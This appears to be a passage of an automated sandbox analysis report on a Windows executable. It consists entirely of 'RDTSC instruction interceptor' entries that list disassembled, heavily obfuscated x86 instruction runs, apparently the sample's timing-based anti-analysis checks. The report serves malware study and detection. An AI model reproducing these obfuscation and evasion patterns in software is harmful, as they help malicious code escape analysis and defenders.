                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 547068A second address: 5470722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C929DCh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F4688C929DBh 0x0000000f or esi, 7222CF9Eh 0x00000015 jmp 00007F4688C929E9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 jmp 00007F4688C929DEh 0x00000025 xchg eax, ecx 0x00000026 jmp 00007F4688C929E0h 0x0000002b push eax 0x0000002c pushad 0x0000002d push edx 0x0000002e movzx esi, di 0x00000031 pop edi 0x00000032 push ecx 0x00000033 movsx edi, si 0x00000036 pop esi 0x00000037 popad 0x00000038 xchg eax, ecx 0x00000039 jmp 00007F4688C929DDh 0x0000003e mov eax, dword ptr [76FB65FCh] 0x00000043 pushad 0x00000044 mov cl, 02h 0x00000046 mov ecx, ebx 0x00000048 popad 0x00000049 test eax, eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F4688C929DEh 0x00000052 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470722 second address: 5470734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470734 second address: 5470738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470738 second address: 5470776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46FA6DE98Ch 0x0000000e jmp 00007F4688C1B777h 0x00000013 mov ecx, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4688C1B775h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470776 second address: 54707E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4688C929E8h 0x00000015 adc ax, 87D8h 0x0000001a jmp 00007F4688C929DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F4688C929E8h 0x00000026 sbb al, 00000038h 0x00000029 jmp 00007F4688C929DBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54707E4 second address: 5470813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B76Dh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470813 second address: 5470867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ror eax, cl 0x0000000c jmp 00007F4688C929E5h 0x00000011 leave 0x00000012 jmp 00007F4688C929DEh 0x00000017 retn 0004h 0x0000001a nop 0x0000001b mov esi, eax 0x0000001d lea eax, dword ptr [ebp-08h] 0x00000020 xor esi, dword ptr [001C2014h] 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c push eax 0x0000002d call 00007F468DF8324Ch 0x00000032 push FFFFFFFEh 0x00000034 pushad 0x00000035 jmp 00007F4688C929DDh 0x0000003a popad 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4688C929DDh 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470867 second address: 5470890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C1B777h 0x00000008 pop esi 0x00000009 mov dh, 73h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ret 0x0000000f nop 0x00000010 push eax 0x00000011 call 00007F468DF0C017h 0x00000016 mov edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470890 second address: 5470894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470894 second address: 5470898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470898 second address: 547089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 547089E second address: 54708B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C1B76Fh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54708B8 second address: 54708E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DDh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54708E7 second address: 54708ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54708ED second address: 54708F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54708F1 second address: 5470920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B773h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4688C1B770h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470920 second address: 5470924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470924 second address: 547092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 547092A second address: 547094B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DAh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 547094B second address: 547095A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54201A8 second address: 54201C1 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4688C929DFh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54201C1 second address: 54201D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov al, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, ebx 0x00000012 movsx edi, si 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54201D7 second address: 54201DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54201DD second address: 542020C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B775h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 542020C second address: 542026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4688C929E7h 0x00000009 and esi, 19F0DA2Eh 0x0000000f jmp 00007F4688C929E9h 0x00000014 popfd 0x00000015 call 00007F4688C929E0h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4688C929DDh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 542026B second address: 542029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B778h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 542029F second address: 54202A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54202A3 second address: 54202A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54202A9 second address: 54202D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C929DCh 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test esi, esi 0x00000011 jmp 00007F4688C929DAh 0x00000016 je 00007F46FA7A0D20h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54202D7 second address: 54202DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54202DB second address: 54202E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54202E1 second address: 5420319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C1B777h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420319 second address: 5420331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420331 second address: 542039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F46FA729A4Fh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4688C1B774h 0x00000018 adc ecx, 42366918h 0x0000001e jmp 00007F4688C1B76Bh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F4688C1B776h 0x0000002c jmp 00007F4688C1B775h 0x00000031 popfd 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 542039F second address: 54203A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54203A3 second address: 54203EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edx, dword ptr [esi+44h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4688C1B779h 0x00000013 jmp 00007F4688C1B76Bh 0x00000018 popfd 0x00000019 jmp 00007F4688C1B778h 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54203EF second address: 5420426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or edx, dword ptr [ebp+0Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movzx eax, bx 0x00000013 pushfd 0x00000014 jmp 00007F4688C929DDh 0x00000019 sbb al, FFFFFF86h 0x0000001c jmp 00007F4688C929E1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420426 second address: 5420471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 51h 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B778h 0x0000000b and ch, 00000058h 0x0000000e jmp 00007F4688C1B76Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test edx, 61000000h 0x0000001d pushad 0x0000001e mov ax, B22Bh 0x00000022 mov bx, cx 0x00000025 popad 0x00000026 jne 00007F46FA729989h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420471 second address: 5420477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410811 second address: 5410820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410820 second address: 5410826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410826 second address: 541082A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 541082A second address: 541082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 541082E second address: 54108E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4688C1B777h 0x0000000f and esp, FFFFFFF8h 0x00000012 pushad 0x00000013 mov cx, AA0Bh 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop edx 0x0000001a pushfd 0x0000001b jmp 00007F4688C1B76Ah 0x00000020 jmp 00007F4688C1B775h 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F4688C1B76Ch 0x00000030 add ecx, 28E3CE78h 0x00000036 jmp 00007F4688C1B76Bh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov cx, bx 0x00000042 jmp 00007F4688C1B777h 0x00000047 popad 0x00000048 xchg eax, ebx 0x00000049 jmp 00007F4688C1B776h 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F4688C1B76Ah 0x00000058 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54108E2 second address: 54108F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54108F1 second address: 54109A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4688C1B771h 0x0000000f xchg eax, esi 0x00000010 jmp 00007F4688C1B76Eh 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 pushad 0x0000001a mov dh, cl 0x0000001c call 00007F4688C1B779h 0x00000021 pop esi 0x00000022 popad 0x00000023 call 00007F4688C1B771h 0x00000028 pop ebx 0x00000029 popad 0x0000002a sub ebx, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F4688C1B774h 0x00000034 pushfd 0x00000035 jmp 00007F4688C1B772h 0x0000003a add eax, 094E5648h 0x00000040 jmp 00007F4688C1B76Bh 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54109A3 second address: 5410A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 popad 0x00000014 je 00007F46FA7A8399h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F4688C929E7h 0x00000021 adc eax, 59B0CE9Eh 0x00000027 jmp 00007F4688C929E9h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F4688C929E0h 0x00000033 adc ecx, 30B2C098h 0x00000039 jmp 00007F4688C929DBh 0x0000003e popfd 0x0000003f popad 0x00000040 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000047 pushad 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F4688C929E2h 0x0000004f sbb ax, 6AF8h 0x00000054 jmp 00007F4688C929DBh 0x00000059 popfd 0x0000005a popad 0x0000005b call 00007F4688C929DFh 0x00000060 mov eax, 45CE1B1Fh 0x00000065 pop esi 0x00000066 popad 0x00000067 mov ecx, esi 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F4688C929DEh 0x00000070 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410A84 second address: 5410A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410A96 second address: 5410AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46FA7A82DBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C929DAh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410AB0 second address: 5410AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410AB6 second address: 5410ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410ABA second address: 5410B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 popad 0x00000017 jne 00007F46FA731043h 0x0000001d jmp 00007F4688C1B772h 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007F4688C1B773h 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B0D second address: 5410B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 mov di, ax 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B35 second address: 5410B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B3B second address: 5410B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B4A second address: 5410B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B50 second address: 5410B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4688C929DCh 0x00000010 sbb cl, FFFFFFC8h 0x00000013 jmp 00007F4688C929DBh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F4688C929E6h 0x00000021 xor ah, 00000028h 0x00000024 jmp 00007F4688C929DBh 0x00000029 popfd 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B9E second address: 5410C4F instructions: 0x00000000 rdtsc 0x00000002 call 00007F4688C1B778h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 push edx 0x00000011 mov esi, 51A8011Bh 0x00000016 pop ecx 0x00000017 popad 0x00000018 mov dword ptr [esp], ebx 0x0000001b jmp 00007F4688C1B777h 0x00000020 push dword ptr [ebp+14h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F4688C1B774h 0x0000002a or esi, 01E4FC48h 0x00000030 jmp 00007F4688C1B76Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F4688C1B778h 0x0000003c sbb ax, 3EA8h 0x00000041 jmp 00007F4688C1B76Bh 0x00000046 popfd 0x00000047 popad 0x00000048 push dword ptr [ebp+10h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007F4688C1B76Bh 0x00000053 mov ax, 408Fh 0x00000057 popad 0x00000058 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410CDA second address: 5410CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410CDE second address: 5410CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410CE4 second address: 5410D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b jmp 00007F4688C929E0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4688C929DAh 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410D15 second address: 5410D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420E07 second address: 5420E7C instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov di, A6D2h 0x00000010 jmp 00007F4688C929E3h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov eax, 19CD9A0Bh 0x0000001d jmp 00007F4688C929E0h 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F4688C929DEh 0x0000002c sbb ecx, 077A3348h 0x00000032 jmp 00007F4688C929DBh 0x00000037 popfd 0x00000038 mov dx, si 0x0000003b popad 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4688C929DCh 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420E7C second address: 5420E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420E82 second address: 5420E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420BBC second address: 5420BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B76Ch 0x00000012 rdtsc
